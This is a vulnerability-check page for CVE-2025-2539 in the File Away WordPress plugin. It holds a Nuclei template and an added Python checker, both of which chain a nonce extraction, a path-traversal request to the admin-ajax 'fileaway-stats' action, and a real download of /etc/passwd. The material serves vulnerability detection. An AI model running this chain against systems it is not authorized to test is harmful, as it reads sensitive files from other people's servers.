File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
ID: CVE-2025-2539
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp
Description
The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm, to read the contents of arbitrary files on the server, which can contain sensitive information.
YAML Source
```yaml
id: CVE-2025-2539

info:
  name: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm, to read the contents of arbitrary files on the server, which can contain sensitive information.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-away/file-away-39901-missing-authorization-to-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_encrypted.php
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_stats.php
    - https://wordpress.org/plugins/file-away/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2539
    cwe-id: CWE-327
    epss-score: 0.00038
    epss-percentile: 0.08036
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/file-away/"
  tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=fileaway-stats&nonce={{nonce}}&file=/../../../../../../../../etc/passwd

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - fileaway_download

    extractors:
      - type: regex
        part: body
        internal: true
        name: download_url
        group: 1
        regex:
          - '".*(\?.*?)"'

  - raw:
      - |
        GET /{{download_url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: content_type
        words:
          - "application/force-download"
# digest: 4a0a0047304502206b81b441ceed0abd32f7e8d559b5be46efd33ebcb97be60edb1f45e2b241a4b702210092249cf08b1889f5959c7366b54c0f0554caa63a04ab34c1c1726c926181bfe6:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is a Nuclei check for CVE-2025-2539. It chains three requests (the `flow` line in the YAML): it fetches the homepage to extract the `fileaway_stats` nonce the plugin localizes into the page, calls the unauthenticated `fileaway-stats` admin-ajax action with a traversal path, then fetches the download URL returned by the plugin and confirms that the body looks like `/etc/passwd` and is served as `application/force-download`. Run it with Nuclei against the target WordPress site; the `-t` path is relative to the nuclei-templates repository:

```
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-2539.yaml"
```

Note that the third request actually downloads `/etc/passwd` from the target, so a positive result is a real file read, not a harmless probe. If the site does not print the `fileaway_stats` script on the homepage (for example, the plugin is only loaded on pages that use its shortcode), the first extractor finds no nonce and the template reports nothing even though the site may still be vulnerable.
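The same three-step logic as a stand-alone Python checker, added here as an example; it is not part of the Nuclei template or of the File Away plugin. The three regexes, the traversal path and the form parameters are copied from the template above. Everything else is an assumption for the demonstration: the `fetch` callback is injected so the flow can run offline against constructed responses, and the shape of the constructed admin-ajax response (a JSON wrapper around a download link with a `fileaway_download` query parameter) is invented for the demo rather than taken from the plugin.

```python
#!/usr/bin/env python3
"""Re-implementation of the CVE-2025-2539 Nuclei template flow (added example)."""
import re
import sys
import urllib.parse
import urllib.request

# Regexes copied verbatim from the template's extractors and matchers.
NONCE_RE = re.compile(r'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}')
DOWNLOAD_RE = re.compile(r'".*(\?.*?)"')
PASSWD_RE = re.compile(r'root:.*:0:0:')

# Request parameters copied from the template's second request.
AJAX_PATH = "/wp-admin/admin-ajax.php"
TRAVERSAL_FILE = "/../../../../../../../../etc/passwd"


def extract_nonce(homepage_html):
    """Step 1: the nonce the plugin localizes into the page for its stats script."""
    m = NONCE_RE.search(homepage_html)
    return m.group(1) if m else None


def stats_request_body(nonce):
    """Step 2: form body for the unauthenticated fileaway-stats AJAX action.
    safe='/' keeps the traversal path literal, as the template sends it."""
    return urllib.parse.urlencode(
        {"action": "fileaway-stats", "nonce": nonce, "file": TRAVERSAL_FILE}, safe="/"
    )


def extract_download_url(ajax_body):
    """Step 2 matcher + extractor: the body must mention fileaway_download, and the
    query string of the download link (from '?' to the closing quote) is captured."""
    if "fileaway_download" not in ajax_body:
        return None
    m = DOWNLOAD_RE.search(ajax_body)
    return m.group(1) if m else None


def is_passwd_leak(body, content_type):
    """Step 3: both matchers must hit (matchers-condition: and)."""
    return bool(PASSWD_RE.search(body)) and "application/force-download" in content_type


def check_target(base_url, fetch):
    """Run the three-request flow. fetch(method, url, body) -> (content_type, body)."""
    base_url = base_url.rstrip("/")
    _, home = fetch("GET", base_url + "/", None)
    nonce = extract_nonce(home)
    if nonce is None:
        return {"vulnerable": False, "stage": "nonce"}
    _, ajax = fetch("POST", base_url + AJAX_PATH, stats_request_body(nonce))
    query = extract_download_url(ajax)
    if query is None:
        return {"vulnerable": False, "stage": "download_url", "nonce": nonce}
    # The template issues GET /{{download_url}}, i.e. the query string against the site root.
    ctype, leaked = fetch("GET", base_url + "/" + query, None)
    return {"vulnerable": is_passwd_leak(leaked, ctype), "stage": "download",
            "nonce": nonce, "download_url": "/" + query}


def live_fetch(method, url, body):
    """Real HTTP transport for use against an authorized target."""
    data = body.encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    if data is not None:
        req.add_header("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.headers.get("Content-Type", ""), resp.read().decode("utf-8", "replace")


# Constructed responses for the offline run. The JSON wrapper and the
# fileaway_download parameter name are assumptions for this demo only.
HOME_HTML = ('<script>var fileaway_stats = {"ajaxurl":"https:\\/\\/example.test\\/wp-admin'
             '\\/admin-ajax.php","nonce":"9f8e7d6c5b"};</script>')
AJAX_JSON = '{"success":true,"data":"https:\\/\\/example.test\\/?fileaway_download=YWJj"}'
PASSWD_TEXT = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"


def fake_fetch(method, url, body):
    """Fake transport that answers like a vulnerable site built from the constants above."""
    parts = urllib.parse.urlsplit(url)
    path, query = parts.path or "/", parts.query
    if method == "GET" and path == "/" and not query:
        return "text/html", HOME_HTML
    if method == "POST" and path == AJAX_PATH and "action=fileaway-stats" in (body or ""):
        return "application/json", AJAX_JSON
    if method == "GET" and path == "/" and query.startswith("fileaway_download="):
        return "application/force-download", PASSWD_TEXT
    return "text/html", "not found"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_target(sys.argv[1], live_fetch))   # e.g. https://target.example
    else:
        print(check_target("https://example.test", fake_fetch))  # offline demo run
```

Without arguments the script runs the flow against the constructed responses and reports `vulnerable: True`; with a base URL it uses `live_fetch` and performs the same three requests the template does, including the real download of `/etc/passwd` in the last step. Because the regexes are the template's own, the checker inherits its blind spot: a site that does not print the `fileaway_stats` script on the homepage stops at the `nonce` stage.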